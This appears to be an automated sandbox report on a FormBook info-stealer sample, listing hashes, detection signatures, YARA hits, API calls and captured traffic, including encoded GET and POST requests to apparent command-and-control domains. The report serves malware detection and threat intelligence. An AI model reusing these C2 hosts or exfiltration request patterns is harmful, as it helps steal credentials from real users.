Windows Analysis Report
Enquiry24-789.exe

Overview

General Information

Sample name: Enquiry24-789.exe
Analysis ID: 1486291
MD5: abfddc4a2efc5df57ea9d3915a6f3dba
SHA1: f674f09ae8c7032e567b0aaad73f14012b37948f
SHA256: c90b07c5a8fc34bd981b78834dcf6822f48c81db37d3c4e078dbd77e64d6d03b
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: Enquiry24-789.exe ReversingLabs: Detection: 44%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Enquiry24-789.exe Joe Sandbox ML: detected
Source: Enquiry24-789.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: sdchange.pdbGCTL source: svchost.exe, 00000002.00000003.2446693880.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571573.000000000321B000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000003.2581472565.00000000007CB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FNvzpsCDjtsg.exe, 00000004.00000002.3273453544.0000000000D2E000.00000002.00000001.01000000.00000005.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3273224995.0000000000D2E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: Enquiry24-789.exe, 00000000.00000003.2039029012.0000000004040000.00000004.00001000.00020000.00000000.sdmp, Enquiry24-789.exe, 00000000.00000003.2039230118.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2249246087.0000000005000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.000000000559E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.0000000005400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258256121.0000000005200000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.0000000004640000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2486058384.00000000042D0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.00000000047DE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2498182919.000000000448C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Enquiry24-789.exe, 00000000.00000003.2039029012.0000000004040000.00000004.00001000.00020000.00000000.sdmp, Enquiry24-789.exe, 00000000.00000003.2039230118.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2249246087.0000000005000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.000000000559E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.0000000005400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258256121.0000000005200000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000005.00000002.3274369263.0000000004640000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2486058384.00000000042D0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.00000000047DE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2498182919.000000000448C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: sdchange.exe, 00000005.00000002.3274878431.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.000000000315C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2954922095.000000001170C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: sdchange.exe, 00000005.00000002.3274878431.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.000000000315C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2954922095.000000001170C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sdchange.pdb source: svchost.exe, 00000002.00000003.2446693880.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571573.000000000321B000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000003.2581472565.00000000007CB000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C3DBBE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0C2A2 FindFirstFileExW, 0_2_00C0C2A2
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C468EE FindFirstFileW,FindClose, 0_2_00C468EE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C4698F
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C3D076
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C3D3A9
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C49642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C49642
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C4979D
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C49B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C49B2B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C45C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C45C97
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0255C3F0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0255C3F0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then xor eax, eax 5_2_02549C60
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then pop edi 5_2_0254E060
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then pop edi 5_2_0254E02E
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then pop edi 5_2_0256250E
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then mov ebx, 00000004h 5_2_045204E8
Source: Joe Sandbox View IP Address: 195.110.124.133
Source: Joe Sandbox View IP Address: 85.159.66.93
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_00C4CE44
Source: global traffic HTTP traffic detected: GET /ylqc/?UVlTmRqX=AIQenQVDJquvL6CtOttF+rAVEsK4B/9dMyVncsTuYD+LzDwt76VT23ot9Accg6DLScK9AXzr2Nn7uFwrhbH/mmP9iiPkm6E+u9eqnOj9VLHaoNNAK1eH6jHrEJ2Cg0Z1jw==&TLK01=EF3pc2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dressroza.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic HTTP traffic detected: GET /7jx3/?UVlTmRqX=+ZJdQBUjgznkAaTTT3SjyJP/zh+/jdRgdsYgjgQhEU+FM1ZsFkM6/delRywd8pmg9PnOVEnqV6AkYRdeiGJOBd6cD9VKa4nHXqnB4M+5ykQI5xbgCxtTjetQx9crTGFA+g==&TLK01=EF3pc2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.udexo.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic HTTP traffic detected: GET /xn9u/?UVlTmRqX=q8LzHox7RKtGG/WH6JXrmw9pXNpRdFEjHUHiLytE9RGxs1ZcrBZWnD7zumm7JdwcoayhhaK8FSh+TemNQ2QWneapzb32QtJY487IrOyf2rTmigHB/KHNG0HIAnjyt24TlA==&TLK01=EF3pc2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hongsuilai6.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.dressroza.com
Source: global traffic DNS traffic detected: DNS query: www.udexo.net
Source: global traffic DNS traffic detected: DNS query: www.hongsuilai6.shop
Source: global traffic DNS traffic detected: DNS query: www.emme4.online
Source: unknown HTTP traffic detected: POST /7jx3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.udexo.netOrigin: http://www.udexo.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Referer: http://www.udexo.net/7jx3/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36Data Ascii: UVlTmRqX=zbh9T18DoTvfFL3HFEy88KWv7Saes9QIVb8+8wsEWSvnCm1ZA3wX9JSpbQ4ywY2A9tfGe2D5L9hkfylCgWZpF8L8I5BNEdGfX9ynor+g2ycf5yWdMCwiz8hD2PENTEgsjVsDzLo25SFN864GWukcMJBmkSg6SFksY6d9vdPAHdb9RUX8z2zmA6ZaZDezGgfuRRRPxco=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 01 Aug 2024 20:23:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-01T20:23:17.7627179Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 01 Aug 2024 20:23:47 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 01 Aug 2024 20:23:50 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 01 Aug 2024 20:23:53 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 01 Aug 2024 20:23:55 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 20:24:01 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dujn/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 20:24:04 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dujn/ was not found on this server.</p></body></html>
Source: FNvzpsCDjtsg.exe, 00000008.00000002.3273598788.000000000113D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emme4.online
Source: FNvzpsCDjtsg.exe, 00000008.00000002.3273598788.000000000113D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emme4.online/dujn/
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10331
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdchange.exe, 00000005.00000003.2812307672.00000000079F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: sdchange.exe, 00000005.00000002.3274878431.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.00000000036D6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.udexo.net/7jx3/?UVlTmRqX=
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C4EAFF
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00C4ED6A
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_00C3AA57
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C69576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00C69576

E-Banking Fraud

Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Enquiry24-789.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Enquiry24-789.exe, 00000000.00000000.2028075623.0000000000C92000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_bd7e973c-8
Source: Enquiry24-789.exe, 00000000.00000000.2028075623.0000000000C92000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_67a93b65-c
Source: Enquiry24-789.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a243ab49-c
